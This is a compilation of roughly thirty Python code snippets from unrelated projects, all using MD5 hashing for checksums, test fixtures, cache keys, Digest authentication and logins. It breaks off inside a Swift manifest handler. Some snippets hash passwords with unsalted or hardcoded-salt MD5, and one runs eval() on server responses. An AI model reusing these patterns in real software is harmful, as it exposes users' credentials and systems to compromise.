Example #1
import hashlib

def hashPassword(key):
	#Step 1 conversion of input to md5
	m = hashlib.md5()
	m.update(key)
	s1=m.hexdigest()
	print str(s1)
	#print 'Step 1 md5 ',s1
	#Step 2: convert s1 into a salted string
	#by inserting the salt two characters in from both the left and the right end
	salt=r'tilak@Google05-05-1995#IndiaSal$100000$'
	l=len(s1)
	mid=s1[2:-2]
	s2=str(s1[0]+s1[1]+salt+mid+salt+s1[-2]+s1[-1])
	#print 's2  ',s2
	#Step 3
	#Converting salt version to md5 again
	m=hashlib.md5()
	m.update(s2)
	s3=m.hexdigest()
	#print 's3  ',s3
	#Step 4 
	#Replacement algorithm
	#replacing 9 by 1
	temp=s3.replace('9','1')
	#replacing 0 by 5
	temp=temp.replace('0','5')
	#replacing a by t
	temp=temp.replace('a','t')
	# The snippet is truncated here; returning the substituted digest is an
	# assumption.
	return temp
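For comparison, a minimal Python 3 sketch of the same salt-and-substitute scheme; the explicit .encode() calls are additions, since the Python 2 original feeds byte strings to md5 directly:

import hashlib

SALT = r'tilak@Google05-05-1995#IndiaSal$100000$'

def hash_password(key: str) -> str:
    # Step 1: md5 of the raw input
    s1 = hashlib.md5(key.encode('utf-8')).hexdigest()
    # Step 2: wrap the salt around the middle of the digest,
    # keeping two characters on each end
    s2 = s1[:2] + SALT + s1[2:-2] + SALT + s1[-2:]
    # Step 3: md5 of the salted string
    s3 = hashlib.md5(s2.encode('utf-8')).hexdigest()
    # Step 4: the same character substitutions as above
    return s3.replace('9', '1').replace('0', '5').replace('a', 't')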
Example #2
    def _generate_suppress_file(self, suppress_file):
        """
        create a dummy supppress file just to check if the old and the new
        suppress format can be processed
        """
        import calendar
        import time
        import hashlib
        import random

        hash_version = '1'
        suppress_stuff = []
        for i in range(10):
            # epoch time
            t = calendar.timegm(time.gmtime())
            # random number
            r = random.randint(1, 9999999)
            n = str(t) + str(r)
            suppress_stuff.append(hashlib.md5(n).hexdigest() + '#' + hash_version)

        s_file = open(suppress_file, 'w')
        for k in suppress_stuff:
            s_file.write(k + '||' + 'idziei éléáálk ~!@#$#%^&*() \n')
            s_file.write(k + '||' + 'test_~!@#$%^&*.cpp' + '||' 'idziei éléáálk ~!@#$%^&*(\n')
            s_file.write(hashlib.md5(n).hexdigest() + '||' + 'test_~!@#$%^&*.cpp' + '||' 'idziei éléáálk ~!@#$%^&*(\n')

        s_file.close()
Example #3
    def setup_bad_zero_byte(self, with_ts=False):
        self.auditor = auditor.ObjectAuditor(self.conf)
        self.auditor.log_time = 0
        ts_file_path = ''
        if with_ts:
            name_hash = hash_path('a', 'c', 'o')
            dir_path = os.path.join(
                self.devices, 'sda',
                storage_directory(get_data_dir(0), '0', name_hash))
            ts_file_path = os.path.join(dir_path, '99999.ts')
            if not os.path.exists(dir_path):
                mkdirs(dir_path)
            fp = open(ts_file_path, 'w')
            write_metadata(fp, {'X-Timestamp': '99999', 'name': '/a/c/o'})
            fp.close()

        etag = md5()
        with self.disk_file.create() as writer:
            etag = etag.hexdigest()
            metadata = {
                'ETag': etag,
                'X-Timestamp': str(normalize_timestamp(time.time())),
                'Content-Length': 10,
            }
            writer.put(metadata)
            etag = md5()
            etag = etag.hexdigest()
            metadata['ETag'] = etag
            write_metadata(writer._fd, metadata)
        return ts_file_path
Example #4
def test_hexdump(vm, params):
    """
    Test hexdump command
    """
    add_ref = params.get("gf_add_ref", "disk")
    readonly = "yes" == params.get("gf_add_readonly")

    gf = utils_test.libguestfs.GuestfishTools(params)
    if add_ref == "disk":
        image_path = params.get("image_path")
        gf.add_drive_opts(image_path, readonly=readonly)
    elif add_ref == "domain":
        vm_name = params.get("main_vm")
        gf.add_domain(vm_name, readonly=readonly)
    gf.run()
    mount_point = params.get("mount_point")
    gf.mount(mount_point, "/")

    gf_result = gf.hexdump("/file_ops/file_ascii").stdout.strip()
    m = hashlib.md5()
    m.update(gf_result)
    logging.debug(m.hexdigest())
    if m.hexdigest() != "3ca9739a70e246745ee6bb55e11f755b":
        gf.close_session()
        raise error.TestFail("hexdump failed.")
    gf_result = gf.hexdump("/file_ops/file_tgz").stdout.strip()
    m = hashlib.md5()
    m.update(gf_result)
    logging.debug(m.hexdigest())
    if m.hexdigest() != "ee00d7203bea3081453c4f41e29f92b4":
        gf.close_session()
        raise error.TestFail("hexdump failed.")

    gf.close_session()
Example #5
def encrypt(userID, password):
  first_md5 = hashlib.md5()
  first_md5.update(str(password))
  salt = first_md5.hexdigest()
  second_md5 = hashlib.md5()
  second_md5.update(str(userID) + salt)
  return second_md5.hexdigest()
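In effect encrypt() computes md5(str(userID) + md5(str(password)).hexdigest()), with the inner digest serving as the salt. A minimal usage sketch (Python 2; the values are hypothetical):

token = encrypt(10001, 'hunter2')  # hypothetical userID and password
print token  # 32-character hex digest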
Example #6
    def test_findall(self):
        sheet = self.sheet

        list_len = 10
        range_label = 'A1:A%s' % list_len
        cell_list = sheet.range(range_label)
        value = hashlib.md5(str(time.time())).hexdigest()

        for c in cell_list:
            c.value = value
        sheet.update_cells(cell_list)

        result_list = sheet.findall(value)

        self.assertEqual(list_len, len(result_list))

        for c in result_list:
            self.assertEqual(c.value, value)

        cell_list = sheet.range(range_label)

        value = hashlib.md5(str(time.time())).hexdigest()
        for c in cell_list:
            char = chr(random.randrange(ord('a'), ord('z')))
            c.value = "%s%s_%s%s" % (c.value, char, char.upper(), value)

        sheet.update_cells(cell_list)

        o_O_re = re.compile('[a-z]_[A-Z]%s' % value)

        result_list = sheet.findall(o_O_re)

        self.assertEqual(list_len, len(result_list))
Example #7
    def test_object_run_fast_track_non_zero(self):
        self.auditor = auditor.ObjectAuditor(self.conf)
        self.auditor.log_time = 0
        data = '0' * 1024
        etag = md5()
        with self.disk_file.create() as writer:
            writer.write(data)
            etag.update(data)
            etag = etag.hexdigest()
            metadata = {
                'ETag': etag,
                'X-Timestamp': str(normalize_timestamp(time.time())),
                'Content-Length': str(os.fstat(writer._fd).st_size),
            }
            writer.put(metadata)
            etag = md5()
            etag.update('1' + '0' * 1023)
            etag = etag.hexdigest()
            metadata['ETag'] = etag
            write_metadata(writer._fd, metadata)

        quarantine_path = os.path.join(self.devices,
                                       'sda', 'quarantined', 'objects')
        kwargs = {'mode': 'once'}
        kwargs['zero_byte_fps'] = 50
        self.auditor.run_audit(**kwargs)
        self.assertFalse(os.path.isdir(quarantine_path))
        del kwargs['zero_byte_fps']
        self.auditor.run_audit(**kwargs)
        self.assertTrue(os.path.isdir(quarantine_path))
Example #8
	def delete(self, url):
		bucket = self.get_bucket()
		info, ret = bucket.delete(self.bucket_name, hashlib.md5(url).hexdigest())
		if ret.status_code == 200:
			logging.info("delete: %s" % hashlib.md5(url).hexdigest())
		else:
			logging.error("error delete: %s" % hashlib.md5(url).hexdigest())
Example #9
	def fetch(self, url):
		bucket = self.get_bucket()
		info, ret = bucket.fetch(url, self.bucket_name, hashlib.md5(url).hexdigest())
		if ret.status_code == 200:
			return info
		else:
			logging.error("error fetch: %s" %  hashlib.md5(url).hexdigest())
Example #10
    def _create_manifest(self):
        # Create a manifest file for SLO uploading
        object_name = data_utils.rand_name(name='TestObject')
        object_name_base_1 = object_name + '_01'
        object_name_base_2 = object_name + '_02'
        data_size = MIN_SEGMENT_SIZE
        self.content = data_utils.arbitrary_string(data_size)
        self._create_object(self.container_name,
                            object_name_base_1,
                            self.content)
        self._create_object(self.container_name,
                            object_name_base_2,
                            self.content)

        path_object_1 = '/%s/%s' % (self.container_name,
                                    object_name_base_1)
        path_object_2 = '/%s/%s' % (self.container_name,
                                    object_name_base_2)
        data_manifest = [{'path': path_object_1,
                          'etag': hashlib.md5(self.content).hexdigest(),
                          'size_bytes': data_size},
                         {'path': path_object_2,
                          'etag': hashlib.md5(self.content).hexdigest(),
                          'size_bytes': data_size}]

        return json.dumps(data_manifest)
Example #11
def test(input=""):
    """test(input): displays results of input hashed with our md5
    function and the standard Python hashlib implementation
    """
    print repr(md5(input).hexdigest())
    import hashlib
    print repr(hashlib.md5(input).hexdigest())
Example #12
def DigestCalcResponse(HA1, pszNonce, pszNonceCount, pszCNonce, pszQop, pszMethod, pszDigestUri, pszHEntity):
    delim = ':'.encode()
    m = md5()
    m.update(pszMethod.encode())
    m.update(delim)
    m.update(pszDigestUri.encode())
    if pszQop == "auth-int":
        m.update(delim)
        m.update(pszHEntity.encode())
    HA2 = m.hexdigest()
    m = md5()
    m.update(HA1)
    m.update(delim)
    m.update(pszNonce.encode())
    m.update(delim)
    if pszNonceCount and pszCNonce and pszQop:
        m.update(pszNonceCount.encode())
        m.update(delim)
        m.update(pszCNonce.encode())
        m.update(delim)
        m.update(pszQop.encode())
        m.update(delim)
    m.update(HA2.encode())
    response = m.hexdigest()
    return response
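This implements the response computation of RFC 2617 HTTP Digest authentication: response = MD5(HA1:nonce:nc:cnonce:qop:HA2). A hedged usage sketch; the digest_calc_ha1 helper is an assumption (not part of the snippet above), shown with the sample values from the RFC:

from hashlib import md5

def digest_calc_ha1(username, realm, password):
    # HA1 = MD5(username ':' realm ':' password), per RFC 2617. Returned as
    # hex *bytes* because DigestCalcResponse feeds it to m.update(HA1)
    # without encoding it.
    return md5(':'.join([username, realm, password]).encode()).hexdigest().encode()

ha1 = digest_calc_ha1('Mufasa', 'testrealm@host.com', 'Circle Of Life')
response = DigestCalcResponse(ha1, 'dcd98b7102dd2f0e8b11d0f600bfb0c093',
                              '00000001', '0a4f113b', 'auth',
                              'GET', '/dir/index.html', '')
# With these RFC 2617 sample values the result should be
# '6629fae49393a05397450978507c4ef1'.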
Example #13
    def start(self, vm_path, username="", password="", shot_path=""):
        # creating a file .pid
        self.lock_file = '/tmp/lock.pid'
        if not os.path.exists(self.lock_file):
            lock = open(self.lock_file, 'w')
            lock.close()
        
        first = "%s/file1.png" % shot_path  
        self.proc = subprocess.Popen("%s -gu %s -gp %s captureScreen %s %s" % (self.vmrun, username, password, vm_path, first))
        first_hash = hashlib.md5(open(first, 'rb').read()).digest()
        
        while True:
            
            if not os.path.exists(self.lock_file):
                print "stopping time"
                break
            
            # Take screenshot
            # TODO: 
            # username, password of guest account

            cur = "%s/file12.png" % shot_path  
            self.proc = subprocess.Popen("%s -gu %s -gp %s captureScreen %s %s" % (self.vmrun, username, password, vm_path, cur))
            # 2. md5 of file
            cur_hash = hashlib.md5(open(cur, 'rb').read()).digest()

            # 3. if md5 current == previous delete file
            if cur_hash == first_hash:
                print "removing %s" % cur
                os.remove(cur)
            # 4. sleeping time
            sleep(1)
Example #14
def hashmd5(*args):
    """
    .. function:: hashmd5(args)

    Returns an MD5 hash of args. Numbers are converted to text before hashing is
    performed.

    Examples:

    >>> sql("select hashmd5(65)")
    hashmd5(65)
    --------------------------------
    fc490ca45c00b1249bbe3554a4fdf6fb
    >>> sql("select hashmd5(6,5)")
    hashmd5(6,5)
    --------------------------------
    f0d95c20cde50e3ca03cab53f986b6c3
    >>> sql("select hashmd5(5)")
    hashmd5(5)
    --------------------------------
    e4da3b7fbbce2345d7772b0674a318d5
    >>> sql("select hashmd5('5')")
    hashmd5('5')
    --------------------------------
    7000aaf68ca7a93da0af3d03850571c2
    """

    if len(args) == 1:
        return hashlib.md5(repr(args[0])).hexdigest()
    else:
        return hashlib.md5(chr(30).join([repr(x) for x in args])).hexdigest()
Example #15
def hashmd5mod(*args):
    """
    .. function:: hashmd5mod(args, divisor) -> int

    Returns the *modulo* with divisor number of the MD5 hash of args.
    Numbers are converted to text before hashing is performed.

    Examples:

    >>> sql("select hashmd5mod(65, 3)")
    hashmd5mod(65, 3)
    -----------------
    0

    >>> sql("select hashmd5mod(6,5, 4)")
    hashmd5mod(6,5, 4)
    ------------------
    2

    >>> sql("select hashmd5mod(5, 5)")
    hashmd5mod(5, 5)
    ----------------
    3
    
    >>> sql("select hashmd5mod('5', 5)")
    hashmd5mod('5', 5)
    ------------------
    4
    """

    if len(args) == 2:
        return int(hashlib.md5(repr(args[0])).hexdigest(), 16) % args[-1]
    else:
        return int(hashlib.md5(chr(30).join([repr(x) for x in args])).hexdigest(), 16) % args[-1]
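The modulo form gives a stable bucket index, e.g. for partitioning rows. A Python 2 check of the single-argument branch, using the docstring's hashmd5mod(65, 3) == 0:

import hashlib

assert int(hashlib.md5(repr(65)).hexdigest(), 16) % 3 == 0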
Example #16
 def test_palette(self):
     PAL = self.palette.savePAL()
     self.assertEqual(len(self.file), len(PAL))
     self.assertEqual(md5(self.file).hexdigest(), md5(PAL).hexdigest())
     newPalette = PalFile(PAL).getPalette()
     for i in xrange(len(self.palette)):
         self.assertEqual(self.palette[i], newPalette[i])
Example #17
    def test_repeatability(self):
        import hashlib
        # We use a md5 hash of generated sequences of 1000 samples
        # in the range [0, 6) for all but np.bool, where the range
        # is [0, 2). Hashes are for little endian numbers.
        tgt = {'bool': '7dd3170d7aa461d201a65f8bcf3944b0',
               'int16': '1b7741b80964bb190c50d541dca1cac1',
               'int32': '4dc9fcc2b395577ebb51793e58ed1a05',
               'int64': '17db902806f448331b5a758d7d2ee672',
               'int8': '27dd30c4e08a797063dffac2490b0be6',
               'uint16': '1b7741b80964bb190c50d541dca1cac1',
               'uint32': '4dc9fcc2b395577ebb51793e58ed1a05',
               'uint64': '17db902806f448331b5a758d7d2ee672',
               'uint8': '27dd30c4e08a797063dffac2490b0be6'}

        for dt in self.itype[1:]:
            np.random.seed(1234)

            # view as little endian for hash
            if sys.byteorder == 'little':
                val = self.rfunc(0, 6, size=1000, dtype=dt)
            else:
                val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()

            res = hashlib.md5(val.view(np.int8)).hexdigest()
            assert_(tgt[np.dtype(dt).name] == res)

        # bools do not depend on endianness
        np.random.seed(1234)
        val = self.rfunc(0, 2, size=1000, dtype=np.bool).view(np.int8)
        res = hashlib.md5(val).hexdigest()
        assert_(tgt[np.dtype(np.bool).name] == res)
Example #18
    def _run(self, edit, selections, r, data, view=None):
        global ignore_modified_timeout

        if not hasattr(self, 'view'):
            return selections

        start = max(int(r[0]), 0)
        stop = min(int(r[1]), self.view.size())
        region = sublime.Region(start, stop)

        if stop - start > 10000:
            self.view.replace(edit, region, data)
            G.VIEW_TO_HASH[self.view.buffer_id()] = hashlib.md5(sutils.get_text(self.view).encode('utf-8')).hexdigest()
            return transform_selections(selections, stop, 0)

        existing = self.view.substr(region)
        i = 0
        data_len = len(data)
        existing_len = len(existing)
        length = min(data_len, existing_len)
        while (i < length):
            if existing[i] != data[i]:
                break
            i += 1
        j = 0
        while j < (length - i):
            if existing[existing_len - j - 1] != data[data_len - j - 1]:
                break
            j += 1
        region = sublime.Region(start + i, stop - j)
        replace_str = data[i:data_len - j]
        self.view.replace(edit, region, replace_str)
        G.VIEW_TO_HASH[self.view.buffer_id()] = hashlib.md5(sutils.get_text(self.view).encode('utf-8')).hexdigest()
        new_offset = len(replace_str) - ((stop - j) - (start + i))
        return transform_selections(selections, start + i, new_offset)
Example #19
    def test_write_truncate(self):
        knowngood = {}
        filelist = list(self.pak2.listfiles())
        for f in filelist:
            self.pak2.open(f)
            data = self.pak2.read()
            knowngood[f] = [len(data), md5(data).hexdigest()]
        size = getsize(self.filename2)

        buf = "123456789"
        bufmd5 = md5(buf).hexdigest()
        for i in xrange(0, len(filelist), 2):
            self.pak2.open(filelist[i], "r")
            size -= len(self.pak2.read())
            self.pak2.close()
            self.pak2.open(filelist[i], "w")
            self.pak2.write(buf)
            self.pak2.close()
            size += len(buf)
            knowngood[filelist[i]][0] = len(buf)
            knowngood[filelist[i]][1] = bufmd5

        for f in filelist:
            self.assertEqual(filelist, list(self.pak2.listfiles()))
            self.pak2.open(f)
            data = self.pak2.read()
            self.assertEqual(len(data), knowngood[f][0])
            self.assertEqual(md5(data).hexdigest(), knowngood[f][1])

        del self.pak2
        self.assertEqual(getsize(self.filename2), size)
Example #20
    def check_vaga(self):
        """ checando se tem vaga """
        filename = os.path.join(self.folder, self.conf['backup'])

        while True:
            try:
                if not os.path.exists(filename):
                    data = self._get()
                    parse = self._parse(data)
                    self.lasthash = hashlib.md5(str(parse)).hexdigest()
                    self.salvar_dados(self._linhas(parse))
                else:
                    if not self.lasthash:
                        dadosantigos = self.carregando_dados()
                        self.lasthash = hashlib.md5(
                            dadosantigos.encode('utf-8')).hexdigest()
                    data = self._get()
                    parse = self._linhas(self._parse(data))
                    lasthash = hashlib.md5(parse.encode('utf-8')).hexdigest()
                    if lasthash != self.lasthash:
                        print "Existe algo novo"
                        self.enviar_notificacao()
                        self.salvar_dados(parse)
                        self.lasthash = lasthash
            except Exception as e:
                print "Error: %s" % e
                pass

            time.sleep(self.conf['periodo'])
Example #21
    def calculate_md5_of_dir(self, verbose=0):
        """
        Calculate the md5 of the entire directory,
        with the md5 in client_snapshot and the md5 of full filepath string.
        When the filepath isn't in client_snapshot the md5 is calculated on fly
        :return is the md5 hash of the directory
        """
        directory = self.cfg['sharing_path']
        if verbose:
            start = time.time()
        md5Hash = hashlib.md5()
        if not os.path.exists(directory):
            self.stop(1, 'Error during calculate md5! Impossible to find "{}" in user folder'.format(directory))

        for root, dirs, files in os.walk(directory, followlinks=False):
            for names in files:
                filepath = os.path.join(root, names)
                rel_path = self.relativize_path(filepath)
                if rel_path in self.client_snapshot:
                    md5Hash.update(self.client_snapshot[rel_path][1])
                    md5Hash.update(hashlib.md5(filepath).hexdigest())
                else:
                    hashed_file = self.hash_file(filepath)
                    if hashed_file:
                        md5Hash.update(hashed_file)
                        md5Hash.update(hashlib.md5(filepath).hexdigest())
                    else:
                        print "can't hash file: ", filepath

        if verbose:
            stop = time.time()
            print stop - start
        return md5Hash.hexdigest()
Example #22
    def test_unknown_emulator(self):
        """Objective: Emulator testing for non-malicious requests.
        Input: http://localhost:8080/
        Expected Result: One of the generated attack surfaces.
        Notes:"""

        tmp_file = os.path.join(self.data_dir, 'dork_pages', format(str(uuid.uuid4())))

        with open(tmp_file, 'w+') as f:
            f.write("tmpfile")
        print "Starting 'unknown' request emulation module"
        event = attack.AttackEvent()
        event.http_request = HTTPHandler('', None)
        event.matched_pattern = "unknown"
        event.http_request.path = "/"
        event.source_ip = "127.0.0.1"
        event.source_port = "8080"
        request_handler = RequestHandler(self.data_dir)
        emulator = request_handler.get_handler(event.matched_pattern)
        print "Sending request:", "http://localhost:8080/"
        emulator.handle(event)
        remote_hash = hashlib.md5(event.http_request.get_response_body()).hexdigest()
        local_hash = hashlib.md5(emulator.template).hexdigest()
        print "Hash of the local 'response' file:", local_hash
        self.assertEqual(remote_hash, local_hash)
        print "Return value:", remote_hash
        print "matched a generated attack surface item."
Example #23
def save(request):
    form = forms.SaveForm(request.POST)
    if not form.is_valid():
        return http.HttpResponseBadRequest(str(form.errors))
    url = form.cleaned_data['url']
    upload_time = form.cleaned_data['upload_time']
    cache_key = 'length_%s' % hashlib.md5(url).hexdigest()
    size = cache.get(cache_key)
    if not size:
        r = requests.head(url)
        size = int(r.headers['content-length'])
        if not size:
            return http.HttpResponseBadRequest('URL could not be downloaded')
    cache_key = 'file_name_%s' % hashlib.md5(url).hexdigest()
    file_name = cache.get(cache_key)
    if not file_name:
        file_name = os.path.basename(url)

    cache_key = 'mime_type_%s' % hashlib.md5(url).hexdigest()
    mime_type = cache.get(cache_key)

    new_upload = Upload.objects.create(
        user=request.user,
        url=url,
        size=size,
        file_name=file_name,
        mime_type=mime_type,
        upload_time=upload_time,
    )
    messages.info(
        request,
        'Upload saved.'
    )
    context = {'id': new_upload.pk, 'url': new_upload.url}
    if request.session.get('active_event'):
        event_id = request.session['active_event']
        event = Event.objects.get(pk=event_id)
        event.upload = new_upload
        event.save()
        new_upload.event = event
        new_upload.save()
        next_url = reverse('manage:event_archive', args=(event_id,))
        next_url += '#vidly-shortcutter'
        context['event'] = {
            'url': next_url,
            'title': event.title,
        }
    elif request.session.get('active_suggested_event'):
        event_id = request.session['active_suggested_event']
        event = SuggestedEvent.objects.get(pk=event_id)
        event.upload = new_upload
        event.save()
        new_upload.suggested_event = event
        new_upload.save()
        next_url = reverse('suggest:description', args=(event_id,))
        context['suggested_event'] = {
            'url': next_url,
            'title': event.title
        }
    return context
Example #24
    def hash_image_string(self, fp):
        """Returns hash based on image data

        Args:
            fp (str): path to image file

        Returns:
            Hash of image data as string
        """
        # FIXME: Output directory is hardcoded
        try:
            return hashlib.md5(Image.open(fp).tobytes()).hexdigest()
        except IOError:
            # Encountered a file format that PIL can't handle. Convert
            # file to something usable, hash, then delete the derivative.
            print 'Hashing jpeg derivative...'
            fn = os.path.basename(fp)
            jpeg = os.path.splitext(fn)[0] + '.jpg'
            cmd = 'iconvert "{}" "{}"'.format(fp, jpeg)  # FIXME
            return_code = subprocess.call(cmd, cwd=r'D:\embedded')
            if return_code:
                self.logfile.write('Error: {}: Bad return code ({})\n'.format(
                    fp, return_code))
            dst = os.path.join(r'D:\embedded', jpeg)
            h = hashlib.md5(Image.open(dst).tobytes()).hexdigest()
            os.remove(dst)
            return h
Example #25
 def main_loop(self):
     while True:
         try:
             time.sleep(1)
             this_dir = os.listdir(os.getcwd())
             that_dir = eval(urllib.urlopen(self.url + "/list/" + self.username + "/" + self.password).read())
             if str(this_dir) != str(that_dir):
                 for this in this_dir:
                     if this not in self.files and this != sys.argv[0]:
                         with open(this, "rb") as md5file:
                             print "added", this
                             self.files[this] = hashlib.md5(md5file.read()).hexdigest()
                     if this not in that_dir and this != sys.argv[0]:
                         thread.start_new_thread(self.upload, (this,))
                 for that in that_dir:
                     if that not in this_dir:
                         thread.start_new_thread(self.download, (that,))
                 for file in self.files:
                     try:
                         with open(file, "rb") as check_file:
                             check = hashlib.md5(check_file.read()).hexdigest()
                             if check != self.files[file]:
                                 print file, "changed"
                                 urllib.urlopen(
                                     self.url + "/delete/" + self.username + "/" + self.password + "/" + file
                                 )
                                 self.files[file] = check
                                 thread.start_new_thread(self.upload, (file,))
                     except IOError:
                         pass
         except IOError:
             print "It seems as though your server is down, please check it."
             time.sleep(60)
Example #26
def avatar_file_path(instance=None, filename=None, size=None, ext=None):
    tmppath = [settings.AVATAR_STORAGE_DIR]
    userdirname = get_username(instance.user)
    if settings.AVATAR_USERID_AS_USERDIRNAME:
        userdirname = str(instance.user_id)
    if settings.AVATAR_HASH_USERDIRNAMES:
        tmp = hashlib.md5(userdirname).hexdigest()
        tmppath.extend([tmp[0], tmp[1], userdirname])
    else:
        tmppath.append(userdirname)
    if not filename:
        # Filename already stored in database
        filename = instance.avatar.name
        if ext and settings.AVATAR_HASH_FILENAMES:
            # An extension was provided, probably because the thumbnail
            # is in a different format than the file. Use it. Because it's
            # only enabled if AVATAR_HASH_FILENAMES is true, we can trust
            # it won't conflict with another filename
            (root, oldext) = os.path.splitext(filename)
            filename = root + "." + ext
    else:
        # File doesn't exist yet
        if settings.AVATAR_HASH_FILENAMES:
            (root, ext) = os.path.splitext(filename)
            filename = hashlib.md5(force_bytes(filename)).hexdigest()
            filename = filename + ext
    if size:
        tmppath.extend(['resized', str(size)])
    tmppath.append(os.path.basename(filename))
    return os.path.join(*tmppath)
Example #27
 def login_and_get_cookie(self, username, password):
     pattern = re.compile(r'^0\d{2,3}\d{7,8}$|^1[34578]\d{9}$')
     if (pattern.match(username)):
         print 'cellphone login'
         action = 'https://music.163.com/api/login/cellphone'
         data = {
             'phone': username,
             'password': hashlib.md5(str(password)).hexdigest(),
             'rememberLogin': '******'
         }
     else:
         action = 'http://music.163.com/api/login/'
         data = {
             'username': username,
             'password': hashlib.md5(str(password)).hexdigest(),
             'rememberLogin': '******'
         }
     s = requests.Session()
     try:
         connection = s.post(
             action,
             data=data,
             headers=self.header,
             timeout=default_timeout
         )
         connection.encoding = "UTF-8"
         connection = json.loads(connection.text)
         self.uid = connection['account']['id']
         self.save_cookie(s.cookies)
         self.cookies = s.cookies
         return s.cookies
     except:
         print 'login failed'
         return None
Example #28
 def test_compression_decompression_noeos(self):
     # call compression and decompression on random data of various sizes
     for i in range(18):
         size = 1 << i
         original = generate_random(size)
         result = pylzma.decompress(pylzma.compress(original, eos=0), maxlength=size)
         self.assertEqual(md5(original).hexdigest(), md5(result).hexdigest())
Example #29
 def getEncryption(self):
     puk = rsa.PublicKey(int(
         'F20CE00BAE5361F8FA3AE9CEFA495362'
         'FF7DA1BA628F64A347F0A8C012BF0B25'
         '4A30CD92ABFFE7A6EE0DC424CB6166F8'
         '819EFA5BCCB20EDFB4AD02E412CCF579'
         'B1CA711D55B8B0B3AEB60153D5E0693A'
         '2A86F3167D7847A0CB8B00004716A909'
         '5D9BADC977CBB804DBDCBA6029A97108'
         '69A453F27DFDDF83C016D928B3CBF4C7',
         16
     ), 3)
     e = int(self.qq).to_bytes(8, 'big')
     o = hashlib.md5(self.pwd.encode())
     r = bytes.fromhex(o.hexdigest())
     p = hashlib.md5(r + e).hexdigest()
     a = binascii.b2a_hex(rsa.encrypt(r, puk)).decode()
     s = hex(len(a) // 2)[2:]
     l = binascii.hexlify(self.vcode.upper().encode()).decode()
     c = hex(len(l) // 2)[2:]
     c = '0' * (4 - len(c)) + c
     s = '0' * (4 - len(s)) + s
     salt = s + a + binascii.hexlify(e).decode() + c + l
     return base64.b64encode(
         tea.encrypt(bytes.fromhex(salt), bytes.fromhex(p))
     ).decode().replace('/', '-').replace('+', '*').replace('=', '_')
Example #30
def write_default_config():
    c = configparser.ConfigParser()
    if not c.has_section('bgmi'):
        c.add_section('bgmi')

    for k in __writeable__:
        v = globals().get(k, '0')
        if k == 'ADMIN_TOKEN' and v is None:
            if sys.version_info > (3, 0):
                v = hashlib.md5(str(random.random()).encode('utf-8')).hexdigest()
            else:
                v = hashlib.md5(str(random.random())).hexdigest()

        c.set('bgmi', k, v)

    if DOWNLOAD_DELEGATE not in DOWNLOAD_DELEGATE_MAP.keys():
        raise Exception(DOWNLOAD_DELEGATE)

    if not c.has_section(DOWNLOAD_DELEGATE):
        c.add_section(DOWNLOAD_DELEGATE)

    for k in DOWNLOAD_DELEGATE_MAP.get(DOWNLOAD_DELEGATE, []):
        v = globals().get(k, None)
        c.set(DOWNLOAD_DELEGATE, k, v)

    try:
        with open(CONFIG_FILE_PATH, 'w') as f:
            c.write(f)
    except IOError:
        print('[-] Error writing to config file and ignored')
Example #31
def md5(s):
    return hashlib.md5(s.encode('utf-8')).hexdigest()[:4]
Example #32
def get_hash(paths):
    # Returns a single hash value of a list of paths (files or dirs)
    size = sum(os.path.getsize(p) for p in paths if os.path.exists(p))  # sizes
    h = hashlib.md5(str(size).encode())  # hash sizes
    h.update(''.join(paths).encode())  # hash paths
    return h.hexdigest()  # return hash
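A hedged usage sketch for get_hash (the paths are hypothetical): the digest changes whenever a listed path's size changes or the path list itself changes, which makes it suitable as a cache key.

cache_key = get_hash(['data/labels.txt', 'data/images'])  # hypothetical paths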
Example #33
    def handle_multipart_put(self, req, start_response):
        """
        Will handle the PUT of a SLO manifest.
        Heads every object in manifest to check if is valid and if so will
        save a manifest generated from the user input. Uses WSGIContext to
        call self and start_response and returns a WSGI iterator.

        :params req: a swob.Request with an obj in path
        :raises: HttpException on errors
        """
        try:
            vrs, account, container, obj = req.split_path(1, 4, True)
        except ValueError:
            return self.app(req.environ, start_response)
        if req.content_length > self.max_manifest_size:
            raise HTTPRequestEntityTooLarge("Manifest File > %d bytes" %
                                            self.max_manifest_size)
        if req.headers.get('X-Copy-From'):
            raise HTTPMethodNotAllowed(
                'Multipart Manifest PUTs cannot be COPY requests')
        if req.content_length is None and \
                req.headers.get('transfer-encoding', '').lower() != 'chunked':
            raise HTTPLengthRequired(request=req)
        parsed_data = parse_input(req.body_file.read(self.max_manifest_size))
        problem_segments = []

        if len(parsed_data) > self.max_manifest_segments:
            raise HTTPRequestEntityTooLarge(
                'Number of segments must be <= %d' %
                self.max_manifest_segments)
        total_size = 0
        out_content_type = req.accept.best_match(ACCEPTABLE_FORMATS)
        if not out_content_type:
            out_content_type = 'text/plain'
        data_for_storage = []
        slo_etag = md5()
        for index, seg_dict in enumerate(parsed_data):
            obj_name = seg_dict['path']
            if isinstance(obj_name, unicode):
                obj_name = obj_name.encode('utf-8')
            obj_path = '/'.join(['', vrs, account, obj_name.lstrip('/')])
            if req.path == quote(obj_path):
                raise HTTPConflict('Manifest object name "%s" '
                                   'cannot be included in the manifest' %
                                   obj_name)
            try:
                seg_size = int(seg_dict['size_bytes'])
            except (ValueError, TypeError):
                raise HTTPBadRequest('Invalid Manifest File')
            if seg_size < self.min_segment_size and \
                    index < len(parsed_data) - 1:
                raise HTTPBadRequest(
                    'Each segment, except the last, must be at least '
                    '%d bytes.' % self.min_segment_size)

            new_env = req.environ.copy()
            new_env['PATH_INFO'] = obj_path
            new_env['REQUEST_METHOD'] = 'HEAD'
            new_env['swift.source'] = 'SLO'
            del new_env['wsgi.input']
            del new_env['QUERY_STRING']
            new_env['CONTENT_LENGTH'] = 0
            new_env['HTTP_USER_AGENT'] = \
                '%s MultipartPUT' % req.environ.get('HTTP_USER_AGENT')
            head_seg_resp = \
                Request.blank(obj_path, new_env).get_response(self)
            if head_seg_resp.is_success:
                total_size += seg_size
                if seg_size != head_seg_resp.content_length:
                    problem_segments.append([quote(obj_name), 'Size Mismatch'])
                if seg_dict['etag'] == head_seg_resp.etag:
                    slo_etag.update(seg_dict['etag'])
                else:
                    problem_segments.append([quote(obj_name), 'Etag Mismatch'])
                if head_seg_resp.last_modified:
                    last_modified = head_seg_resp.last_modified
                else:
                    # shouldn't happen
                    last_modified = datetime.now()

                last_modified_formatted = \
                    last_modified.strftime('%Y-%m-%dT%H:%M:%S.%f')
                seg_data = {
                    'name': '/' + seg_dict['path'].lstrip('/'),
                    'bytes': seg_size,
                    'hash': seg_dict['etag'],
                    'content_type': head_seg_resp.content_type,
                    'last_modified': last_modified_formatted
                }
                if config_true_value(
